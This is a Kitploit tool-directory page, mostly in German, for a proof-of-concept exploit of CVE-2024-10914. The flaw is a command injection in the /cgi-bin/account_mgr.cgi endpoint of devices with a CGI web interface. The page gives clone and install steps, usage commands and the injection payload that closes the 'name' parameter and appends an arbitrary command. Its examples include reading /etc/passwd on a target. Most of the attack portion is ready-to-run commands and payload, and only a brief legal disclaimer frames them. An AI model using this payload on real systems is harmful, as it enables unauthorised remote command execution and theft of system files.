Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-10914__POC — PoC para explotar el CVE-2024-10914 | Kitploit
Tools/GitHubGitHub/0xss3k/cve-2024-10914__poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlLernen & Bildung
GitHub0xss3k/cve-2024-10914__poc

CVE-2024-10914__POC

PoC para explotar el CVE-2024-10914

Repository anzeigen
3vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-10914 - Konzeptnachweis

Exploit für eine Command Injection-Schwachstelle im Endpunkt /cgi-bin/account_mgr.cgi. Diese Schwachstelle ermöglicht die Ausführung beliebiger Befehle auf dem betroffenen System über nicht bereinigte Parameter.

Beschreibung der Schwachstelle

CVE-2024-10914 ist eine Command Injection-Schwachstelle, die Geräte mit einer CGI-Webschnittstelle betrifft. Die anfällige Anwendung validiert den Parameter name in der Anfrage cgi_user_add nicht ordnungsgemäß, sodass ein Angreifer Systembefehle einschleusen kann, die mit den Rechten der Anwendung ausgeführt werden.

Anforderungen

  • Python 3.7+
  • requests-Bibliothek

Installation

Klonen Sie das Repository und installieren Sie die Abhängigkeiten:

root@kitploit:~
git clone https://github.com/0xSS3K/CVE-2024-10914__POC.git
cd CVE-2024-10914__POC
pip install -r requirements.txt

Oder installieren Sie manuell:

root@kitploit:~
Tool herunterladen
pip install requests

Verwendung

Das Skript akzeptiert zwei Argumente:

root@kitploit:~
python CVE-2024-10914_EXPLOIT.py -u <URL> -c <COMANDO>

Parameter

  • -u, --url (erforderlich): URL des Ziels (Beispiel: http://192.168.1.1)
  • -c, --command (optional): Auszuführender Befehl (Standard: id)

Beispiele

Befehl id ausführen:

root@kitploit:~
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1

Benutzerdefinierten Befehl ausführen:

root@kitploit:~
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 -c "cat /etc/passwd"

Dateien auflisten:

root@kitploit:~
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 -c "ls -la /tmp"

Technische Funktionsweise

Der Exploit sendet eine GET-Anfrage an den verwundbaren Endpunkt mit folgendem Payload:

root@kitploit:~
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name="; <COMANDO>; "

Die leere Zeichenkette wird mit Anführungszeichen geschlossen und der gewünschte Befehl eingeschleust, der im Kontext des Servers ausgeführt wird.

Antwort

Das Skript zeigt Folgendes an:

  • Verbindungsstatus
  • Gesendeter Payload
  • HTTP-Statuscode
  • Vollständige Antwort des Servers

Rechtliche Warnung

Dieser Code wird ausschließlich zu Bildungs- und Sicherheitsforschungszwecken bereitgestellt. Er darf nur auf Systemen verwendet werden, für die Sie eine ausdrückliche Genehmigung haben. Die unbefugte Nutzung dieses Exploits kann gegen lokale Gesetze verstoßen und eine Straftat darstellen. Der Autor übernimmt keine Haftung für die missbräuchliche Verwendung dieses Werkzeugs.

Referenzen

  • CVE-2024-10914
  • CVSS-Score: TBD

Autor

SS3K

Lizenz

Nicht angegeben